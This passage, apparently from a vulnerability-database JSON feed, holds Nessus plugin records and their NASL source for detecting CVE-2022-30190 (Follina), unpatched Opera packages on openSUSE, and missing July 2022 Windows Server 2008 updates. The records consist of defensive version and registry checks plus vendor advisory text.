value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\");\n # https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9345997\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the latest Cumulative Update.\");\n\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:msdt\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\ninclude('smb_reg_query.inc');\ninclude('spad_log_func.inc');\ninclude('smb_func.inc');\n\nregistry_init();\nvar hkcr = registry_hive_connect(hive:HKEY_CLASS_ROOT, exit_on_fail:TRUE);\n\nif (!registry_key_exists(handle:hkcr, key:'ms-msdt'))\n{\n spad_log(message:'HKEY_CLASSES_ROOT\\\\ms-msdt does not exist, auditing');\n close_registry();\n audit(AUDIT_OS_CONF_NOT_VULN, 'Windows');\n}\n\nvar report = 'The HKEY_CLASSES_ROOT\\\\ms-msdt registry key exists on the target. This may indicate that the target is' +\n ' vulnerable to CVE-2022-30190, if the vendor patch is not applied.';\n\nvar port = kb_smb_transport();\nclose_registry();\nsecurity_report_v4(severity:SECURITY_NOTE, extra:report, port:port);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-29T15:30:13", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:10088-1 advisory.\n\n - Use after free in Cast UI and Toolbar in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via UI interaction. (CVE-2022-2163)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.\n (CVE-2022-2477)\n\n - Use after free in PDF in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2478)\n\n - Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive information from internal file directories via a crafted HTML page. (CVE-2022-2479)\n\n - Use after free in Service Worker API in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2480)\n\n - Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via UI interaction.\n (CVE-2022-2481)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10088-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2163", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296", "CVE-2022-2477", "CVE-2022-2478", "CVE-2022-2479", "CVE-2022-2480", "CVE-2022-2481"], "modified": "2023-03-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.4"], "id": "OPENSUSE-2022-10088-1.NASL", "href": "https://www.tenable.com/plugins/nessus/164144", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10088-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164144);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\n \"CVE-2022-2163\",\n \"CVE-2022-2294\",\n \"CVE-2022-2295\",\n \"CVE-2022-2296\",\n \"CVE-2022-2477\",\n \"CVE-2022-2478\",\n \"CVE-2022-2479\",\n \"CVE-2022-2480\",\n \"CVE-2022-2481\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10088-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:10088-1 advisory.\n\n - Use after free in Cast UI and Toolbar in Google Chrome prior to 103.0.5060.134 allowed an attacker who\n convinced a user to install a malicious extension to potentially exploit heap corruption via UI\n interaction. (CVE-2022-2163)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a\n user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.\n (CVE-2022-2477)\n\n - Use after free in PDF in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2478)\n\n - Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134\n allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive\n information from internal file directories via a crafted HTML page. (CVE-2022-2479)\n\n - Use after free in Service Worker API in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2480)\n\n - Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a\n user to engage in specific user interactions to potentially exploit heap corruption via UI interaction.\n (CVE-2022-2481)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/C6CFP4ALDNAUZ4ZAOFXUPGCPSV42N26M/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2a5cb63\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2163\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2477\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2478\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2479\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2480\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2481\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2481\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.4\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.4', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-89.0.4447.71-lp154.2.14.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:11:28", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:10087-1 advisory.\n\n - Use after free in Cast UI and Toolbar in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via UI interaction. (CVE-2022-2163)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via direct UI interactions. (CVE-2022-2296)\n\n - Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.\n (CVE-2022-2477)\n\n - Use after free in PDF in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2478)\n\n - Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134 allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive information from internal file directories via a crafted HTML page. (CVE-2022-2479)\n\n - Use after free in Service Worker API in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2480)\n\n - Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via UI interaction.\n (CVE-2022-2481)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10087-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2163", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296", "CVE-2022-2477", "CVE-2022-2478", "CVE-2022-2479", "CVE-2022-2480", "CVE-2022-2481"], "modified": "2023-03-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-10087-1.NASL", "href": "https://www.tenable.com/plugins/nessus/164134", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10087-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164134);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/23\");\n\n script_cve_id(\n \"CVE-2022-2163\",\n \"CVE-2022-2294\",\n \"CVE-2022-2295\",\n \"CVE-2022-2296\",\n \"CVE-2022-2477\",\n \"CVE-2022-2478\",\n \"CVE-2022-2479\",\n \"CVE-2022-2480\",\n \"CVE-2022-2481\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10087-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:10087-1 advisory.\n\n - Use after free in Cast UI and Toolbar in Google Chrome prior to 103.0.5060.134 allowed an attacker who\n convinced a user to install a malicious extension to potentially exploit heap corruption via UI\n interaction. (CVE-2022-2163)\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - Type confusion in V8 in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2295)\n\n - Use after free in Chrome OS Shell in Google Chrome on Chrome OS prior to 103.0.5060.114 allowed a remote\n attacker who convinced a user to engage in specific user interactions to potentially exploit heap\n corruption via direct UI interactions. (CVE-2022-2296)\n\n - Use after free in Guest View in Google Chrome prior to 103.0.5060.134 allowed an attacker who convinced a\n user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page.\n (CVE-2022-2477)\n\n - Use after free in PDF in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2022-2478)\n\n - Insufficient validation of untrusted input in File in Google Chrome on Android prior to 103.0.5060.134\n allowed an attacker who convinced a user to install a malicious app to obtain potentially sensitive\n information from internal file directories via a crafted HTML page. (CVE-2022-2479)\n\n - Use after free in Service Worker API in Google Chrome prior to 103.0.5060.134 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2480)\n\n - Use after free in Views in Google Chrome prior to 103.0.5060.134 allowed a remote attacker who convinced a\n user to engage in specific user interactions to potentially exploit heap corruption via UI interaction.\n (CVE-2022-2481)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SBC3VMU74SRNP6PNL6PMNTJCIFN32DXR/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05668353\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2163\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2294\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2295\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2296\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2477\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2478\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2479\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2480\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-2481\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-2481\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-89.0.4447.71-lp153.2.54.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-24T18:50:41", "description": "The remote Windows host is missing security update 5015870 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015870: Windows Server 2008 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015870.NASL", "href": "https://www.tenable.com/plugins/nessus/163051", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163051);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015866\");\n script_xref(name:\"MSKB\", value:\"5015870\");\n script_xref(name:\"MSFT\", value:\"MS22-5015866\");\n script_xref(name:\"MSFT\", value:\"MS22-5015870\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015870: Windows Server 2008 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015870 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226). \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015870\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015866\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015870 or Cumulative Update 5015866\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 